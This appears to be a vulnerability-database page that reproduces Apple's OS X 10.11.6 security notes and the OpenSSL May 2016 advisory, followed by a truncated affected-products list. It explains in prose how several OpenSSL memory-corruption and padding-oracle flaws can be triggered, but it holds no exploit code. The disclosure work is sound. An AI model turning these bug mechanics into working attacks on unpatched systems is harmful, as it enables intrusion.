libexpat Available for: OS X El Capitan v10.11 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-0718 : Gustavo Grieco
LibreSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in LibreSSL before 2.2.7. These were addressed by updating LibreSSL to version 2.2.7. CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand, Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An access issue existed in the parsing of maliciously crafted XML files. This issue was addressed through improved input validation. CVE-2016-4449 : Kostya Serebryany
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxml2 Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4448 : Apple CVE-2016-4483 : Gustavo Grieco CVE-2016-4614 : Nick Wellnhofe CVE-2016-4615 : Nick Wellnhofer CVE-2016-4616 : Michael Paddon CVE-2016-4619 : Hanno Boeck
libxslt Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1684 : Nicolas GrA(c)goire CVE-2016-4607 : Nick Wellnhofer CVE-2016-4608 : Nicolas GrA(c)goire CVE-2016-4609 : Nick Wellnhofer CVE-2016-4610 : Nick Wellnhofer CVE-2016-4612 : Nicolas GrA(c)goire
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to compromise of user information Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to the compromise of user information Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a denial of service Description: A memory initialization issue was addressed through improved memory handling. CVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
OpenSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in OpenSSL. CVE-2016-2105 : Guido Vranken CVE-2016-2106 : Guido Vranken CVE-2016-2107 : Juraj Somorovsky CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter CVE-2016-2176 : Guido Vranken
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4596 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4597 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4600 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4602 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4598 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted SGI file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4601 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4599 : Ke Liu of Tencent's Xuanwu Lab
Safari Login AutoFill Available for: OS X El Capitan v10.11 and later Impact: A user's password may be visible on screen Description: An issue existed in Safari's password auto-fill. This issue was addressed through improved matching of form fields. CVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD
Sandbox Profiles Available for: OS X El Capitan v10.11 and later Impact: A local application may be able to access the process list Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-2016-4594 : Stefan Esser of SektionEins
Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900
OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y +cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy pSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV xj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u wevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN ZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k ah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk mmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC JM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc 55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs xPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5 YozOGPQFmX0OviWCQsX6 =ng+m -----END PGP SIGNATURE----- . The bug causing the vulnerability was fixed on April 18th 2015, and released as part of the June 11th 2015 security releases. The security impact of the bug was not known at the time.
In previous versions of OpenSSL, ASN.1 encoding the value zero represented as a negative integer can cause a buffer underflow with an out-of-bounds write in i2c_ASN1_INTEGER. The ASN.1 parser does not normally create "negative zeroes" when parsing ASN.1 input, and therefore, an attacker cannot trigger this bug.
However, a second, independent bug revealed that the ASN.1 parser (specifically, d2i_ASN1_TYPE) can misinterpret a large universal tag as a negative zero value. Large universal tags are not present in any common ASN.1 structures (such as X509) but are accepted as part of ANY structures.
Therefore, if an application deserializes untrusted ASN.1 structures containing an ANY field, and later reserializes them, an attacker may be able to trigger an out-of-bounds write. This has been shown to cause memory corruption that is potentially exploitable with some malloc implementations.
Applications that parse and re-encode X509 certificates are known to be vulnerable. Applications that verify RSA signatures on X509 certificates may also be vulnerable; however, only certificates with valid signatures trigger ASN.1 re-encoding and hence the bug. Specifically, since OpenSSL's default TLS X509 chain verification code verifies the certificate chain from root to leaf, TLS handshakes could only be targeted with valid certificates issued by trusted Certification Authorities.
OpenSSL 1.0.2 users should upgrade to 1.0.2c OpenSSL 1.0.1 users should upgrade to 1.0.1o
This vulnerability is a combination of two bugs, neither of which individually has security impact. The first bug (mishandling of negative zero integers) was reported to OpenSSL by Huzaifa Sidhpurwala (Red Hat) and independently by Hanno Böck in April 2015. The second issue (mishandling of large universal tags) was found using libFuzzer, and reported on the public issue tracker on March 1st 2016. The fact that these two issues combined present a security vulnerability was reported by David Benjamin (Google) on March 31st 2016. The fixes were developed by Steve Henson of the OpenSSL development team, and David Benjamin. The OpenSSL team would also like to thank Mark Brand and Ian Beer from the Google Project Zero team for their careful analysis of the impact.
The fix for the "negative zero" memory corruption bug can be identified by commits
3661bb4e7934668bd99ca777ea8b30eedfafa871 (1.0.2) and 32d3b0f52f77ce86d53f38685336668d47c5bdfe (1.0.1)
Padding oracle in AES-NI CBC MAC check (CVE-2016-2107)
Severity: High
A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server support AES-NI.
This issue was introduced as part of the fix for Lucky 13 padding attack (CVE-2013-0169). The padding check was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 13th of April 2016 by Juraj Somorovsky using TLS-Attacker. The fix was developed by Kurt Roeckx of the OpenSSL development team.
EVP_EncodeUpdate overflow (CVE-2016-2105)
Severity: Low
An overflow can occur in the EVP_EncodeUpdate() function which is used for Base64 encoding of binary data. If an attacker is able to supply very large amounts of input data then a length check can overflow resulting in a heap corruption.
Internally to OpenSSL the EVP_EncodeUpdate() function is primarly used by the PEM_write_bio family of functions. These are mainly used within the OpenSSL command line applications. These internal uses are not considered vulnerable because all calls are bounded with length checks so no overflow is possible. User applications that call these APIs directly with large amounts of untrusted data may be vulnerable. (Note: Initial analysis suggested that the PEM_write_bio were vulnerable, and this is reflected in the patch commit message. This is no longer believed to be the case).
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
EVP_EncryptUpdate overflow (CVE-2016-2106)
Severity: Low
An overflow can occur in the EVP_EncryptUpdate() function. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption. Following an analysis of all OpenSSL internal usage of the EVP_EncryptUpdate() function all usage is one of two forms. The first form is where the EVP_EncryptUpdate() call is known to be the first called function after an EVP_EncryptInit(), and therefore that specific call must be safe. The second form is where the length passed to EVP_EncryptUpdate() can be seen from the code to be some small value and therefore there is no possibility of an overflow. Since all instances are one of these two forms, it is believed that there can be no overflows in internal code due to this problem. It should be noted that EVP_DecryptUpdate() can call EVP_EncryptUpdate() in certain code paths. Also EVP_CipherUpdate() is a synonym for EVP_EncryptUpdate(). All instances of these calls have also been analysed too and it is believed there are no instances in internal usage where an overflow could occur.
This could still represent a security issue for end user code that calls this function directly.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
ASN.1 BIO excessive memory allocation (CVE-2016-2109)
Severity: Low
When ASN.1 data is read from a BIO using functions such as d2i_CMS_bio() a short invalid encoding can casuse allocation of large amounts of memory potentially consuming excessive resources or exhausting memory.
Any application parsing untrusted data through d2i BIO functions is affected. The memory based functions such as d2i_X509() are not affected. Since the memory based functions are used by the TLS library, TLS applications are not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 4th April 2016 by Brian Carpenter. The fix was developed by Stephen Henson of the OpenSSL development team.
EBCDIC overread (CVE-2016-2176)
Severity: Low
ASN1 Strings that are over 1024 bytes can cause an overread in applications using the X509_NAME_oneline() function on EBCDIC systems. This could result in arbitrary stack data being returned in the buffer.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 5th March 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160503.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201605-0037", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "commerce guided search / oracle commerce experience manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.5.1" }, { "model": "transportation management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.2" }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions (linux)" }, { "model": "commerce guided search / oracle commerce experience manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.3.0" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0" }, { "model": "ip38x/3000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "6.2" }, { "model": "ip38x/3500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ip38x/fw120", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "transportation management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.1" }, { "model": "ip38x/1200", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8.3" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard v8.2 to v9.4" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver6.1 to v8.0" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.2" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "netvisorpro 6.1" }, { "model": "ip38x/810", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.3" }, { "model": "ip38x/n500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "15.x" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "commerce guided search / oracle commerce experience manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.2.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.0" }, { "model": "ip38x/1210", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "16.x" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "e-business suite", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "12.1.3" }, { "model": "commerce guided search / oracle commerce experience manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.1" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1t" }, { "model": "commerce guided search / oracle commerce experience manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.5.2" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "business connect v7.1.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v4.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 and later" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "ip38x/5000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "7.0" }, { "model": "ip38x/sr100", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "commerce guided search / oracle commerce experience manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6.5.0" }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8.4" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2h" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "11.5.1" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "1000v" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1s" }, { "model": "spa51x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "network health framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2.1" }, { "model": "unified series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "780011.5.2" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.2" }, { "model": "10.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.6(3)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.2" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.53" }, { "model": "emergency responder", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.6.0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "nexus series blade switches 0.9.8zf", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "telepresence isdn link", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1.6" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "cognos insight fp if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.216" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.6" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.131" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "mediasense 9.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.35" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.119" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "aspera shares", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.9.6" }, { "model": "10.1-release-p26", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.8" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "prime collaboration assurance sp1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "tivoli netcool system service monitors fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "cognos insight fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.26" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13-34" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "im and presence service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "ata analog telephone adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1879.2.5" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.15" }, { "model": "tivoli netcool system service monitors fp15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "prime license manager", "scope": 